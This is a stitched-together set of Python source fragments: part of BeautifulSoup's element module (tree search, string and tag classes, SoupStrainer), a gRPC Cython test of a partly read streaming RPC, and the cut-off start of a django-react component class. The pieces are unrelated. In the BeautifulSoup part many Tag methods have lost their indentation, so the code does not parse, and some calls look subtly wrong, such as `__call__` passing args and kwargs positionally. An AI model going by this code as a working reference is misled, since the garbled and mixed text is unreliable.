                             **kwargs)
    findAllNext = find_all_next  # BS3
    def find_next_sibling(self, name=None, attrs={}, text=None, **kwargs):
        """Returns the closest sibling to this Tag that matches the
        given criteria and appears after this Tag in the document."""
        return self._find_one(self.find_next_siblings, name, attrs, text,
                             **kwargs)
    findNextSibling = find_next_sibling  # BS3
    def find_next_siblings(self, name=None, attrs={}, text=None, limit=None,
                           **kwargs):
        """Returns the siblings of this Tag that match the given
        criteria and appear after this Tag in the document."""
        return self._find_all(name, attrs, text, limit,
                              self.next_siblings, **kwargs)
    findNextSiblings = find_next_siblings  # BS3
    fetchNextSiblings = find_next_siblings  # BS2
    def find_previous(self, name=None, attrs={}, text=None, **kwargs):
        """Returns the first item that matches the given criteria and
        appears before this Tag in the document."""
        return self._find_one(
            self.find_all_previous, name, attrs, text, **kwargs)
    findPrevious = find_previous  # BS3
    def find_all_previous(self, name=None, attrs={}, text=None, limit=None,
                        **kwargs):
        """Returns all items that match the given criteria and appear
        before this Tag in the document."""
        return self._find_all(name, attrs, text, limit, self.previous_elements,
                           **kwargs)
    findAllPrevious = find_all_previous  # BS3
    fetchPrevious = find_all_previous  # BS2
    def find_previous_sibling(self, name=None, attrs={}, text=None, **kwargs):
        """Returns the closest sibling to this Tag that matches the
        given criteria and appears before this Tag in the document."""
        return self._find_one(self.find_previous_siblings, name, attrs, text,
                             **kwargs)
    findPreviousSibling = find_previous_sibling  # BS3
    def find_previous_siblings(self, name=None, attrs={}, text=None,
                               limit=None, **kwargs):
        """Returns the siblings of this Tag that match the given
        criteria and appear before this Tag in the document."""
        return self._find_all(name, attrs, text, limit,
                              self.previous_siblings, **kwargs)
    findPreviousSiblings = find_previous_siblings  # BS3
    fetchPreviousSiblings = find_previous_siblings  # BS2
    def find_parent(self, name=None, attrs={}, **kwargs):
        """Returns the closest parent of this Tag that matches the given
        criteria."""
        # NOTE: We can't use _find_one because findParents takes a different
        # set of arguments.
        r = None
        l = self.find_parents(name, attrs, 1)
        if l:
            r = l[0]
        return r
    findParent = find_parent  # BS3
    def find_parents(self, name=None, attrs={}, limit=None, **kwargs):
        """Returns the parents of this Tag that match the given
        criteria."""
        return self._find_all(name, attrs, None, limit, self.parents,
                             **kwargs)
    findParents = find_parents  # BS3
    fetchParents = find_parents  # BS2
    @property
    def next(self):
        return self.next_element
    @property
    def previous(self):
        return self.previous_element
    #These methods do the real heavy lifting.
    def _find_one(self, method, name, attrs, text, **kwargs):
        # Run a find_all-style method with limit=1 and return the single hit.
        r = None
        l = method(name, attrs, text, 1, **kwargs)
        if l:
            r = l[0]
        return r
    def _find_all(self, name, attrs, text, limit, generator, **kwargs):
        "Iterates over a generator looking for things that match."
        if isinstance(name, SoupStrainer):
            strainer = name
        elif text is None and not limit and not attrs and not kwargs:
            # Optimization to find all tags.
            if name is True or name is None:
                return [element for element in generator
                        if isinstance(element, Tag)]
            # Optimization to find all tags with a given name.
            elif isinstance(name, basestring):
                return [element for element in generator
                        if isinstance(element, Tag) and element.name == name]
            else:
                strainer = SoupStrainer(name, attrs, text, **kwargs)
        else:
            # Build a SoupStrainer
            strainer = SoupStrainer(name, attrs, text, **kwargs)
        results = ResultSet(strainer)
        while True:
            try:
                i = next(generator)
            except StopIteration:
                break
            if i:
                found = strainer.search(i)
                if found:
                    results.append(found)
                    if limit and len(results) >= limit:
                        break
        return results
    #These generators can be used to navigate starting from both
    #NavigableStrings and Tags.
    @property
    def next_elements(self):
        i = self.next_element
        while i is not None:
            yield i
            i = i.next_element
    @property
    def next_siblings(self):
        i = self.next_sibling
        while i is not None:
            yield i
            i = i.next_sibling
    @property
    def previous_elements(self):
        i = self.previous_element
        while i is not None:
            yield i
            i = i.previous_element
    @property
    def previous_siblings(self):
        i = self.previous_sibling
        while i is not None:
            yield i
            i = i.previous_sibling
    @property
    def parents(self):
        i = self.parent
        while i is not None:
            yield i
            i = i.parent
    # Old non-property versions of the generators, for backwards
    # compatibility with BS3.
    def nextGenerator(self):
        return self.next_elements
    def nextSiblingGenerator(self):
        return self.next_siblings
    def previousGenerator(self):
        return self.previous_elements
    def previousSiblingGenerator(self):
        return self.previous_siblings
    def parentGenerator(self):
        return self.parents
    # Utility methods
    def substitute_encoding(self, str, encoding=None):
        # Replace the %SOUP-ENCODING% placeholder with a real encoding name.
        encoding = encoding or "utf-8"
        return str.replace("%SOUP-ENCODING%", encoding)
class NavigableString(unicode, PageElement):
    """A plain string that also participates in the parse tree."""
    PREFIX = ''
    SUFFIX = ''
    def __new__(cls, value):
        """Create a new NavigableString.
        When unpickling a NavigableString, this method is called with
        the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be
        passed in to the superclass's __new__ or the superclass won't know
        how to handle non-ASCII characters.
        """
        if not isinstance(value, unicode):
            # Byte string: decode using the default encoding.
            return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)
        return unicode.__new__(cls, value)
    def __getnewargs__(self):
        # Support pickling: reconstruct from the plain string value.
        return (unicode(self),)
    def __getattr__(self, attr):
        """text.string gives you text. This is for backwards
        compatibility for Navigable*String, but for CData* it lets you
        get the string without the CData wrapper."""
        if attr != 'string':
            raise AttributeError(
                "'%s' object has no attribute '%s'" % (
                    self.__class__.__name__, attr))
        return self
    def output_ready(self, substitute_html_entities=False):
        # Optionally entity-escape the text, then wrap it in this
        # class's prefix/suffix markers.
        if substitute_html_entities:
            rendered = EntitySubstitution.substitute_html(self)
        else:
            rendered = self
        return self.PREFIX + rendered + self.SUFFIX
class CData(NavigableString):
    """A CDATA section, rendered as <![CDATA[...]]>."""
    PREFIX = u'<![CDATA['
    SUFFIX = u']]>'
class ProcessingInstruction(NavigableString):
    """A processing instruction, rendered as <?...?>."""
    PREFIX = u'<?'
    SUFFIX = u'?>'
class Comment(NavigableString):
    """An HTML/XML comment, rendered as <!--...-->."""
    PREFIX = u'<!--'
    SUFFIX = u'-->'
class Declaration(NavigableString):
    """A declaration, rendered as <!...!>."""
    PREFIX = u'<!'
    SUFFIX = u'!>'
class Doctype(NavigableString):
    """A <!DOCTYPE> declaration."""
    @classmethod
    def for_name_and_ids(cls, name, pub_id, system_id):
        """Build a Doctype object for the given root element name and
        external IDs.

        Bug fix: the previous version emitted
        ``name PUBLIC "pub" SYSTEM "sys"`` when both IDs were given,
        which is not valid DOCTYPE syntax — with a public ID, the system
        ID follows directly with no SYSTEM keyword. It also crashed when
        name was None.
        """
        value = name or ''
        if pub_id is not None:
            value += ' PUBLIC "%s"' % pub_id
            if system_id is not None:
                value += ' "%s"' % system_id
        elif system_id is not None:
            value += ' SYSTEM "%s"' % system_id
        return Doctype(value)
    PREFIX = u'<!DOCTYPE '
    SUFFIX = u'>'
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
    def __init__(self, parser=None, builder=None, name=None, attrs=None,
                 parent=None, previous=None):
        """Basic constructor.

        :param parser: the BeautifulSoup object building the tree; only its
            class is kept (see below).
        :param builder: the TreeBuilder; consulted for substitutions and
            empty-element rules.
        :param name: the tag name; required.
        :param attrs: mapping of tag attributes; copied into a new dict.
        :param parent: parent element, passed through to setup().
        :param previous: previous element in parse order, passed to setup().
        """
        if parser is None:
            self.parser_class = None
        else:
            # We don't actually store the parser object: that lets extracted
            # chunks be garbage-collected.
            self.parser_class = parser.__class__
        if name is None:
            raise ValueError("No value provided for new tag's name.")
        self.name = name
        if attrs is None:
            attrs = {}
        else:
            # Copy so the caller's mapping is not shared or mutated.
            attrs = dict(attrs)
        self.attrs = attrs
        self.contents = []
        self.setup(parent, previous)
        self.hidden = False
        # Set up any substitutions, such as the charset in a META tag.
        if builder is not None:
            self.contains_substitutions = builder.set_up_substitutions(self)
            self.can_be_empty_element = builder.can_be_empty_element(name)
        else:
            self.contains_substitutions = False
            self.can_be_empty_element = False
    parserClass = _alias("parser_class")  # BS3
@property
def is_empty_element(self):
"""Is this tag an empty-element tag? (aka a self-closing tag)
A tag that has contents is never an empty-element tag.
A tag that has no contents may or may not be an empty-element
tag. It depends on the builder used to create the tag. If the
builder has a designated list of empty-element tags, then only
a tag whose name shows up in that list is considered an
empty-element tag.
If the builder has no designated list of empty-element tags,
then any tag with no contents is an empty-element tag.
"""
return len(self.contents) == 0 and self.can_be_empty_element
isSelfClosing = is_empty_element # BS3
@property
def string(self):
"""Convenience property to get the single string within this tag.
:Return: If this tag has a single string child, return value
is that string. If this tag has no children, or more than one
child, return value is None. If this tag has one child tag,
return value is the 'string' attribute of the child tag,
recursively.
"""
if len(self.contents) != 1:
return None
child = self.contents[0]
if isinstance(child, NavigableString):
return child
return child.string
@string.setter
def string(self, string):
self.clear()
self.append(string)
    def _all_strings(self, strip=False):
        """Yield all child strings, possibly stripping them.

        :param strip: if True, each string is whitespace-stripped and
            strings that become empty are skipped.
        """
        for descendant in self.descendants:
            if not isinstance(descendant, NavigableString):
                continue
            if strip:
                descendant = descendant.strip()
                if len(descendant) == 0:
                    continue
            yield descendant
    strings = property(_all_strings)
@property
def stripped_strings(self):
for string in self._all_strings(True):
yield string
def get_text(self, separator="", strip=False):
"""
Get all child strings, concatenated using the given separator.
"""
return separator.join([s for s in self._all_strings(strip)])
getText = get_text
text = property(get_text)
def decompose(self):
"""Recursively destroys the contents of this tree."""
self.extract()
i = self
while i is not None:
next = i.next_element
i.__dict__.clear()
i = next
def clear(self, decompose=False):
"""
Extract all children. If decompose is True, decompose instead.
"""
if decompose:
for element in self.contents[:]:
if isinstance(element, Tag):
element.decompose()
else:
element.extract()
else:
for element in self.contents[:]:
element.extract()
def index(self, element):
"""
Find the index of a child by identity, not value. Avoids issues with
tag.contents.index(element) getting the index of equal elements.
"""
for i, child in enumerate(self.contents):
if child is element:
return i
raise ValueError("Tag.index: element not in tag")
    def get(self, key, default=None):
        """Return the value of the 'key' attribute, or *default* when the
        tag has no such attribute.  Mirrors dict.get, so callers need not
        special-case missing attributes."""
        return self.attrs.get(key, default)
    def has_attr(self, key):
        """Return True when the tag defines attribute *key*."""
        return key in self.attrs
    def __getitem__(self, key):
        """tag[key] returns the value of the 'key' attribute; raises
        KeyError (from the underlying dict) when it is absent."""
        return self.attrs[key]
    def __iter__(self):
        "Iterating over a tag iterates over its direct children, in order."
        return iter(self.contents)
    def __len__(self):
        "The length of a tag is the number of its direct children."
        return len(self.contents)
    def __contains__(self, x):
        # Membership tests against direct children (by equality).
        return x in self.contents
    def __nonzero__(self):
        "A tag is always truthy, even when it has no contents."
        return True
    def __setitem__(self, key, value):
        """Setting tag[key] sets the value of the 'key' attribute for the
        tag."""
        self.attrs[key] = value
    def __delitem__(self, key):
        "Deleting tag[key] removes the 'key' attribute for the tag."
        # pop with a default: unlike `del dict[key]`, deleting a missing
        # attribute is deliberately a silent no-op.
        self.attrs.pop(key, None)
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
find_all() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
return self.find_all(args, kwargs)
    def __getattr__(self, tag):
        """Unknown attribute access is treated as a tag search: soup.b is
        soup.find("b").  Only called when normal lookup fails."""
        #print "Getattr %s.%s" % (self.__class__, tag)
        if len(tag) > 3 and tag.endswith('Tag'):
            # BS3: soup.aTag -> "soup.find("a")
            tag_name = tag[:-3]
            warnings.warn(
                '.%sTag is deprecated, use .find("%s") instead.' % (
                    tag_name, tag_name))
            return self.find(tag_name)
        # We special case contents to avoid recursion.
        elif not tag.startswith("__") and not tag=="contents":
            return self.find(tag)
        raise AttributeError(
            "'%s' object has no attribute '%s'" % (self.__class__, tag))
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag."""
if self is other:
return True
if (not hasattr(other, 'name') or
not hasattr(other, 'attrs') or
not hasattr(other, 'contents') or
self.name != other.name or
self.attrs != other.attrs or
len(self) != len(other)):
return False
for i, my_child in enumerate(self.contents):
if my_child != other.contents[i]:
return False
return True
    def __ne__(self, other):
        """Returns true iff this tag is not equal to the other tag,
        as defined in __eq__."""
        return not self == other
    def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
        """Renders this tag as an encoded bytestring (Python 2 semantics;
        on Python 3 this is rebound to the unicode renderer below)."""
        return self.encode(encoding)
    def __unicode__(self):
        """Unicode rendering (Python 2 text protocol)."""
        return self.decode()
    def __str__(self):
        """Bytestring rendering in the default encoding (Python 2)."""
        return self.encode()
    if PY3K:
        # On Python 3 str() and repr() must return text, so all three
        # protocols share the unicode renderer.
        __str__ = __repr__ = __unicode__
def encode(self, encoding=DEFAULT_OUTPUT_ENCODING,
indent_level=None, substitute_html_entities=False):
return self.decode(indent_level, encoding,
substitute_html_entities).encode(encoding)
    def decode(self, indent_level=None,
               eventual_encoding=DEFAULT_OUTPUT_ENCODING,
               substitute_html_entities=False):
        """Returns a Unicode representation of this tag and its contents.

        :param indent_level: None disables pretty-printing; any other
        value enables it and sets the indentation depth.
        :param eventual_encoding: The tag is destined to be
        encoded into this encoding. This method is _not_
        responsible for performing that encoding. This information
        is passed in so that it can be substituted in if the
        document contains a <META> tag that mentions the document's
        encoding.
        """
        # Build the attribute strings, sorted by name for stable output.
        attrs = []
        if self.attrs:
            for key, val in sorted(self.attrs.items()):
                if val is None:
                    # Valueless (boolean) attribute: render the bare name.
                    decoded = key
                else:
                    if not isinstance(val, basestring):
                        val = str(val)
                    # Substitute the real encoding into a <META> charset
                    # placeholder, if one was flagged during parsing.
                    if (self.contains_substitutions
                        and eventual_encoding is not None
                        and '%SOUP-ENCODING%' in val):
                        val = self.substitute_encoding(val, eventual_encoding)
                    decoded = (key + '='
                               + EntitySubstitution.substitute_xml(val, True))
                attrs.append(decoded)
        close = ''
        closeTag = ''
        if self.is_empty_element:
            # Self-closing form: "<br />", no closing tag.
            close = ' /'
        else:
            closeTag = '</%s>' % self.name
        pretty_print = (indent_level is not None)
        if pretty_print:
            space = (' ' * (indent_level - 1))
            indent_contents = indent_level + 1
        else:
            space = ''
            indent_contents = None
        contents = self.decode_contents(
            indent_contents, eventual_encoding, substitute_html_entities)
        if self.hidden:
            # This is the 'document root' object: no tags of its own,
            # just the rendered contents.
            s = contents
        else:
            s = []
            attribute_string = ''
            if attrs:
                attribute_string = ' ' + ' '.join(attrs)
            if pretty_print:
                s.append(space)
            s.append('<%s%s%s>' % (self.name, attribute_string, close))
            if pretty_print:
                s.append("\n")
            s.append(contents)
            # Ensure the closing tag starts on its own line.
            if pretty_print and contents and contents[-1] != "\n":
                s.append("\n")
            if pretty_print and closeTag:
                s.append(space)
            s.append(closeTag)
            if pretty_print and closeTag and self.next_sibling:
                s.append("\n")
            s = ''.join(s)
        return s
    def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
        """Render as an indented bytestring in *encoding*."""
        # indent_level=True enables pretty-printing in decode():
        # any non-None value turns it on (True - 1 == 0 spaces of
        # indent for the root element).
        return self.encode(encoding, True)
    def decode_contents(self, indent_level=None,
                        eventual_encoding=DEFAULT_OUTPUT_ENCODING,
                        substitute_html_entities=False):
        """Renders the contents of this tag as a Unicode string.

        :param indent_level: None disables pretty-printing.
        :param eventual_encoding: The tag is destined to be
        encoded into this encoding. This method is _not_
        responsible for performing that encoding. This information
        is passed in so that it can be substituted in if the
        document contains a <META> tag that mentions the document's
        encoding.
        """
        pretty_print = (indent_level is not None)
        s = []
        for c in self:
            text = None
            if isinstance(c, NavigableString):
                text = c.output_ready(substitute_html_entities)
            elif isinstance(c, Tag):
                # Child tags recurse through decode() at the same level.
                s.append(c.decode(indent_level, eventual_encoding,
                                  substitute_html_entities))
            # When pretty-printing, surrounding whitespace is ours to
            # manage, so strip what the string carried.
            if text and indent_level:
                text = text.strip()
            if text:
                if pretty_print:
                    s.append(" " * (indent_level - 1))
                s.append(text)
                if pretty_print:
                    s.append("\n")
        return ''.join(s)
#Soup methods
def find(self, name=None, attrs={}, recursive=True, text=None,
**kwargs):
"""Return only the first child of this Tag matching the given
criteria."""
r = None
l = self.find_all(name, attrs, recursive, text, 1, **kwargs)
if l:
r = l[0]
return r
findChild = find
def find_all(self, name=None, attrs={}, recursive=True, text=None,
limit=None, **kwargs):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
generator = self.descendants
if not recursive:
generator = self.children
return self._find_all(name, attrs, text, limit, generator, **kwargs)
findAll = find_all # BS3
findChildren = find_all # BS2
#Generator methods
    @property
    def children(self):
        """An iterator over this tag's direct children only."""
        # return iter() to make the purpose of the method clear
        return iter(self.contents) # XXX This seems to be untested.
@property
def descendants(self):
if not len(self.contents):
return
stopNode = self._last_descendant().next_element
current = self.contents[0]
while current is not stopNode:
yield current
current = current.next_element
# Old names for backwards compatibility
    def childGenerator(self):
        """Deprecated BS3 name for the `children` property."""
        return self.children
    def recursiveChildGenerator(self):
        """Deprecated BS3 name for the `descendants` property."""
        return self.descendants
# This was kind of misleading because has_key() (attributes) was
# different from __in__ (contents). has_key() is gone in Python 3,
# anyway.
has_key = has_attr
# Next, a couple classes to represent queries and their results.
class SoupStrainer(object):
    """Encapsulates a number of ways of matching a markup element (tag or
    text).

    Each criterion (name, attribute value, text) may be a string, a
    list, a compiled regular expression, or a callable.
    """
    def __init__(self, name=None, attrs={}, text=None, **kwargs):
        self.name = name
        # A bare string for attrs is shorthand for a CSS class match.
        if isinstance(attrs, basestring):
            kwargs['class'] = _match_css_class(attrs)
            attrs = None
        if kwargs:
            if attrs:
                # Merge without mutating the caller's dict.
                attrs = attrs.copy()
                attrs.update(kwargs)
            else:
                attrs = kwargs
        self.attrs = attrs
        self.text = text
    def __str__(self):
        if self.text:
            return self.text
        else:
            return "%s|%s" % (self.name, self.attrs)
    def search_tag(self, markup_name=None, markup_attrs={}):
        """Match a tag by name and attributes.

        *markup_name* may be an actual Tag, or a bare name string paired
        with an attrs mapping (as seen mid-parse, before a Tag exists).
        Returns the matched object or None.
        """
        found = None
        markup = None
        if isinstance(markup_name, Tag):
            markup = markup_name
            markup_attrs = markup
        # A callable name criterion is invoked with (name, attrs) only
        # when we don't yet have a real Tag to hand it.
        call_function_with_tag_data = (
            isinstance(self.name, collections.Callable)
            and not isinstance(markup_name, Tag))
        if ((not self.name)
            or call_function_with_tag_data
            or (markup and self._matches(markup, self.name))
            or (not markup and self._matches(markup_name, self.name))):
            if call_function_with_tag_data:
                match = self.name(markup_name, markup_attrs)
            else:
                match = True
                markup_attr_map = None
                for attr, match_against in list(self.attrs.items()):
                    if not markup_attr_map:
                        # Normalize attrs to a mapping; they may arrive
                        # as a dict-like object or a (key, value) list.
                        if hasattr(markup_attrs, 'get'):
                            markup_attr_map = markup_attrs
                        else:
                            markup_attr_map = {}
                            for k, v in markup_attrs:
                                markup_attr_map[k] = v
                    attr_value = markup_attr_map.get(attr)
                    if not self._matches(attr_value, match_against):
                        match = False
                        break
            if match:
                if markup:
                    found = markup
                else:
                    found = markup_name
        return found
    searchTag = search_tag
    def search(self, markup):
        """Match *markup* (a tag, a string, or a list of either) against
        this strainer's criteria; return the matched object or None."""
        #print 'looking for %s in %s' % (self, markup)
        found = None
        # If given a list of items, scan it for a text element that
        # matches.
        if hasattr(markup, '__iter__') and not isinstance(markup, (Tag, basestring)):
            for element in markup:
                if isinstance(element, NavigableString) \
                       and self.search(element):
                    found = element
                    break
        # If it's a Tag, make sure its name or attributes match.
        # Don't bother with Tags if we're searching for text.
        elif isinstance(markup, Tag):
            if not self.text:
                found = self.search_tag(markup)
        # If it's text, make sure the text matches.
        elif isinstance(markup, NavigableString) or \
                 isinstance(markup, basestring):
            if self._matches(markup, self.text):
                found = markup
        else:
            raise Exception(
                "I don't know how to match against a %s" % markup.__class__)
        return found
    def _matches(self, markup, match_against):
        """Core matching primitive: test one value against one criterion."""
        #print "Matching %s against %s" % (markup, match_against)
        result = False
        if match_against is True:
            # Criterion True means "attribute merely has to exist".
            result = markup is not None
        elif isinstance(match_against, collections.Callable):
            result = match_against(markup)
        else:
            #Custom match methods take the tag as an argument, but all
            #other ways of matching match the tag name as a string.
            if isinstance(markup, Tag):
                markup = markup.name
            if markup is not None and not isinstance(markup, basestring):
                markup = unicode(markup)
            #Now we know that chunk is either a string, or None.
            if hasattr(match_against, 'match'):
                # It's a regexp object.
                result = markup and match_against.search(markup)
            elif (hasattr(match_against, '__iter__')
                  and markup is not None
                  and not isinstance(match_against, basestring)):
                # A list (or other iterable) of acceptable values.
                result = markup in match_against
            elif hasattr(match_against, 'items'):
                # NOTE(review): dict criterion tests containment in the
                # markup string — looks inverted; confirm intent.
                result = match_against in markup
            elif match_against and isinstance(markup, basestring):
                # Coerce to the markup's class so NavigableString
                # comparison semantics apply.
                match_against = markup.__class__(match_against)
            if not result:
                result = match_against == markup
        return result
class ResultSet(list):
    """A ResultSet is just a list that keeps track of the SoupStrainer
    that created it."""
    def __init__(self, source):
        # Initialize *this* list.  The original called list.__init__ on a
        # brand-new empty list literal, which left self uninitialized and
        # only worked by accident.
        super(ResultSet, self).__init__()
        self.source = source
| |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test a corner-case at the level of the Cython API."""
import threading
import unittest
from grpc._cython import cygrpc
from tests.unit._cython import test_utilities
# No operation flags.
_EMPTY_FLAGS = 0
# No initial metadata.
_EMPTY_METADATA = ()
class _ServerDriver(object):
def __init__(self, completion_queue, shutdown_tag):
self._condition = threading.Condition()
self._completion_queue = completion_queue
self._shutdown_tag = shutdown_tag
self._events = []
self._saw_shutdown_tag = False
def start(self):
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events.append(event)
self._condition.notify()
if event.tag is self._shutdown_tag:
self._saw_shutdown_tag = True
break
thread = threading.Thread(target=in_thread)
thread.start()
def done(self):
with self._condition:
return self._saw_shutdown_tag
def first_event(self):
with self._condition:
while not self._events:
self._condition.wait()
return self._events[0]
def events(self):
with self._condition:
while not self._saw_shutdown_tag:
self._condition.wait()
return tuple(self._events)
class _QueueDriver(object):
def __init__(self, condition, completion_queue, due):
self._condition = condition
self._completion_queue = completion_queue
self._due = due
self._events = []
self._returned = False
def start(self):
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events.append(event)
self._due.remove(event.tag)
self._condition.notify_all()
if not self._due:
self._returned = True
return
thread = threading.Thread(target=in_thread)
thread.start()
def done(self):
with self._condition:
return self._returned
def event_with_tag(self, tag):
with self._condition:
while True:
for event in self._events:
if event.tag is tag:
return event
self._condition.wait()
def events(self):
with self._condition:
while not self._returned:
self._condition.wait()
return tuple(self._events)
class ReadSomeButNotAllResponsesTest(unittest.TestCase):
    """Exercises a client that cancels a streaming RPC after reading only
    some of the server's responses, driving the Cython layer directly."""
    def testReadSomeButNotAllResponses(self):
        # --- server setup: queue, server, port, channel -----------------
        server_completion_queue = cygrpc.CompletionQueue()
        server = cygrpc.Server([(
            b'grpc.so_reuseport',
            0,
        )], False)
        server.register_completion_queue(server_completion_queue)
        port = server.add_http2_port(b'[::]:0')
        server.start()
        channel = cygrpc.Channel('localhost:{}'.format(port).encode(), set(),
                                 None)
        # Background drain of the server's own completion queue.
        server_shutdown_tag = 'server_shutdown_tag'
        server_driver = _ServerDriver(server_completion_queue,
                                      server_shutdown_tag)
        server_driver.start()
        client_condition = threading.Condition()
        client_due = set()
        # Tags for the four server-side batches we expect to complete.
        server_call_condition = threading.Condition()
        server_send_initial_metadata_tag = 'server_send_initial_metadata_tag'
        server_send_first_message_tag = 'server_send_first_message_tag'
        server_send_second_message_tag = 'server_send_second_message_tag'
        server_complete_rpc_tag = 'server_complete_rpc_tag'
        server_call_due = set((
            server_send_initial_metadata_tag,
            server_send_first_message_tag,
            server_send_second_message_tag,
            server_complete_rpc_tag,
        ))
        server_call_completion_queue = cygrpc.CompletionQueue()
        server_call_driver = _QueueDriver(server_call_condition,
                                          server_call_completion_queue,
                                          server_call_due)
        server_call_driver.start()
        server_rpc_tag = 'server_rpc_tag'
        request_call_result = server.request_call(server_call_completion_queue,
                                                  server_completion_queue,
                                                  server_rpc_tag)
        # --- client starts the RPC with two initial operation batches ---
        client_receive_initial_metadata_tag = 'client_receive_initial_metadata_tag'
        client_complete_rpc_tag = 'client_complete_rpc_tag'
        client_call = channel.segregated_call(
            _EMPTY_FLAGS, b'/twinkies', None, None, _EMPTY_METADATA, None, (
                (
                    [
                        cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
                    ],
                    client_receive_initial_metadata_tag,
                ),
                (
                    [
                        cygrpc.SendInitialMetadataOperation(
                            _EMPTY_METADATA, _EMPTY_FLAGS),
                        cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
                        cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
                    ],
                    client_complete_rpc_tag,
                ),
            ))
        client_receive_initial_metadata_event_future = test_utilities.SimpleFuture(
            client_call.next_event)
        server_rpc_event = server_driver.first_event()
        # --- server sends initial metadata and its first message --------
        with server_call_condition:
            server_send_initial_metadata_start_batch_result = (
                server_rpc_event.call.start_server_batch([
                    cygrpc.SendInitialMetadataOperation(_EMPTY_METADATA,
                                                        _EMPTY_FLAGS),
                ], server_send_initial_metadata_tag))
            server_send_first_message_start_batch_result = (
                server_rpc_event.call.start_server_batch([
                    cygrpc.SendMessageOperation(b'\x07', _EMPTY_FLAGS),
                ], server_send_first_message_tag))
        server_send_initial_metadata_event = server_call_driver.event_with_tag(
            server_send_initial_metadata_tag)
        server_send_first_message_event = server_call_driver.event_with_tag(
            server_send_first_message_tag)
        # --- server sends a second message and completes the RPC --------
        with server_call_condition:
            server_send_second_message_start_batch_result = (
                server_rpc_event.call.start_server_batch([
                    cygrpc.SendMessageOperation(b'\x07', _EMPTY_FLAGS),
                ], server_send_second_message_tag))
            server_complete_rpc_start_batch_result = (
                server_rpc_event.call.start_server_batch([
                    cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),
                    cygrpc.SendStatusFromServerOperation(
                        (), cygrpc.StatusCode.ok, b'test details',
                        _EMPTY_FLAGS),
                ], server_complete_rpc_tag))
        server_send_second_message_event = server_call_driver.event_with_tag(
            server_send_second_message_tag)
        server_complete_rpc_event = server_call_driver.event_with_tag(
            server_complete_rpc_tag)
        server_call_driver.events()
        client_recieve_initial_metadata_event = client_receive_initial_metadata_event_future.result(
        )
        # --- client reads only the first message, then cancels ----------
        client_receive_first_message_tag = 'client_receive_first_message_tag'
        client_call.operate([
            cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
        ], client_receive_first_message_tag)
        client_receive_first_message_event = client_call.next_event()
        client_call_cancel_result = client_call.cancel(
            cygrpc.StatusCode.cancelled, 'Cancelled during test!')
        client_complete_rpc_event = client_call.next_event()
        # --- teardown and assertions ------------------------------------
        channel.close(cygrpc.StatusCode.unknown, 'Channel closed!')
        server.shutdown(server_completion_queue, server_shutdown_tag)
        server.cancel_all_calls()
        server_driver.events()
        self.assertEqual(cygrpc.CallError.ok, request_call_result)
        self.assertEqual(cygrpc.CallError.ok,
                         server_send_initial_metadata_start_batch_result)
        self.assertIs(server_rpc_tag, server_rpc_event.tag)
        self.assertEqual(cygrpc.CompletionType.operation_complete,
                         server_rpc_event.completion_type)
        self.assertIsInstance(server_rpc_event.call, cygrpc.Call)
if __name__ == '__main__':
    # verbosity=2 prints each test name as it runs.
    unittest.main(verbosity=2)
| |
import sys
import hashlib
import json
from django.template.loader import render_to_string
from django.contrib.staticfiles import finders
from django.utils.safestring import mark_safe
from django.utils import six
from django_react.settings import REACT_EXTERNAL
from .exceptions import (
ReactComponentCalledDirectly, ReactComponentMissingSource, PropSerializationError, ComponentBundlingError,
)
from .render import render_component
from .bundles import ReactBundle
class ReactComponent(object):
    """Server-side wrapper around a React component.

    Subclasses must define `source` (a path resolvable by
    django.contrib.staticfiles) or set `path_to_source` directly.  All
    keyword arguments passed to the constructor become the component's
    props, replicating the React+JSX API.
    """

    source = None
    path_to_source = None
    url_to_source = None
    props = None
    serialized_props = None
    variable = None
    props_variable = None
    bundle = ReactBundle

    def __init__(self, **kwargs):
        # As we use the subclass's name to generate a number of client-side
        # variables, we disallow directly calling the ReactComponent class
        if self.__class__ is ReactComponent:
            raise ReactComponentCalledDirectly('Components must inherit from ReactComponent')
        # Ensure that a source file is defined in either `source` or `path_to_source`
        if self.get_path_to_source() is None:
            raise ReactComponentMissingSource(self)
        # All kwargs are passed to the component as props, this replicates
        # the API used in React+JSX
        self.props = kwargs

    def render_to_string(self, wrap=None):
        """
        Render a component to its initial HTML. You can use this method to generate HTML
        on the server and send the markup down on the initial request for faster page loads
        and to allow search engines to crawl you pages for SEO purposes.

        `render_to_string` takes an optional argument `wrap` which, if set to False, will
        prevent the rendered output from being wrapped in the container element
        generated by the component's `render_container` method.

        ```
        {{ component.render_to_string }}
        ```
        """
        rendered = render_component(
            path_to_source=self.get_path_to_source(),
            serialized_props=self.get_serialized_props(),
        )
        # Wrap by default; only an explicit falsey `wrap` (i.e. False)
        # returns the bare markup.  Previously `wrap=True` incorrectly
        # skipped the container, contradicting the documented contract.
        if wrap or wrap is None:
            return self.render_container(
                content=mark_safe(rendered)
            )
        return rendered

    def render_to_static_markup(self, wrap=None):
        """
        Similar to `ReactComponent.render_to_string`, except this doesn't create
        extra DOM attributes such as `data-react-id`, that React uses internally.

